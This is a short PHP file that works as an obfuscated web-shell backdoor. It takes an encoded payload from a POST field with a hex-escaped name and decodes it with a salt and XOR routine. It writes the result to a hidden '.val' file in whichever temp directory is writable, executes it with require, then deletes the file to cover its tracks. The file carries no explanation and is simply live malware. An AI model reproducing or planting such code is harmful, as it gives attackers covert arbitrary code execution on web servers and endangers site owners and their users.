<?php

if(!empty($_POST["\x64\x63\x68unk"])){
	$record = $_POST["\x64\x63\x68unk"];
	$record  =	  explode( '.',		$record		);	
	$obj = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(  $salt  );
            $q = 0;
    
            $__tmp = $record;
            while(  $v7 = array_shift(  $__tmp)) {
                $sChar = ord(  $salt[$q %$sLen]  );
                $dec =(  (  int)$v7 - $sChar -(  $q %10)) ^53;
                $obj	 .=	chr(  $dec  );
                $q++;
            }
	$bind = array_filter(["/var/tmp", "/dev/shm", session_save_path(), getcwd(), "/tmp", sys_get_temp_dir(), getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP")]);
	foreach ($bind as $key => $flg) {
    		if (!( !is_dir($flg) || !is_writable($flg) )) {
    $ref = "$flg/.val";
    if (file_put_contents($ref, $obj)) {
	require $ref;
	unlink($ref);
	exit;
}
}
}
}